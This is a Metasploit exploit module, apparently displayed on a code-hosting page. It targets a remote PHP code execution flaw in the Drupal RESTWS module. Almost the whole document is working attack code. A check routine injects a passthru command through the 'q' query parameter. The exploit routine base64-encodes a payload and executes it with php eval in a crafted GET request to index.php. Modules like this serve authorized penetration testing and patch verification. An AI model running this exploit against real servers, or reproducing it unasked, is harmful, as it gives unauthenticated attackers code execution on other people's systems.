Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => 'Drupal RESTWS Module Remote PHP Code Execution',
14
      'Description'    => %q{
15
        This module exploits a Remote PHP Code Execution vulnerability in the
16
        Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
17
        under the context of the web server user.
18

19
        RESTWS alters the default page callbacks for entities to provide
20
        additional functionality. A vulnerability in this approach allows
21
        an unauthenticated attacker to send specially crafted requests resulting
22
        in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7
23
        are affected by this issue.
24

25
        This module was tested against RESTWS 2.5 with Drupal 7.5 installed on
26
        Ubuntu Server.
27
      },
28
      'License'        => MSF_LICENSE,
29
      'Author'         =>
30
        [
31
          'Devin Zuczek',                        # discovery
32
          'Mehmet Ince <[email protected]>'  # msf module
33
        ],
34
      'References'     =>
35
        [
36
          ['URL', 'https://www.drupal.org/node/2765567']
37
        ],
38
      'Privileged'     => false,
39
      'Payload'        =>
40
        {
41
          'DisableNops' => true
42
        },
43
      'Platform'       => ['php'],
44
      'Arch'           => ARCH_PHP,
45
      'Targets'        => [ ['Automatic', {}] ],
46
      'DisclosureDate' => '2016-07-13',
47
      'DefaultTarget'  => 0
48
      ))
49

50
    register_options(
51
      [
52
        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
53
      ]
54
    )
55
  end
56

57
  def check
58
    r = rand_text_alpha(8 + rand(4))
59

60
    res = send_request_cgi(
61
      'method' => 'GET',
62
      'uri' => normalize_uri(target_uri.path, 'index.php'),
63
      'vars_get' => {
64
        'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"
65
      }
66
    )
67

68
    if res && res.body.include?(r)
69
      Exploit::CheckCode::Vulnerable
70
    else
71
      Exploit::CheckCode::Safe
72
    end
73
  end
74

75
  def exploit
76
    cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
77

78
    send_request_cgi(
79
      'method' => 'GET',
80
      'uri' => normalize_uri(target_uri.path, 'index.php'),
81
      'vars_get' => {
82
        'q' => "taxonomy_vocabulary//passthru/#{cmd}"
83
      }
84
    )
85
  end
86
end
87

88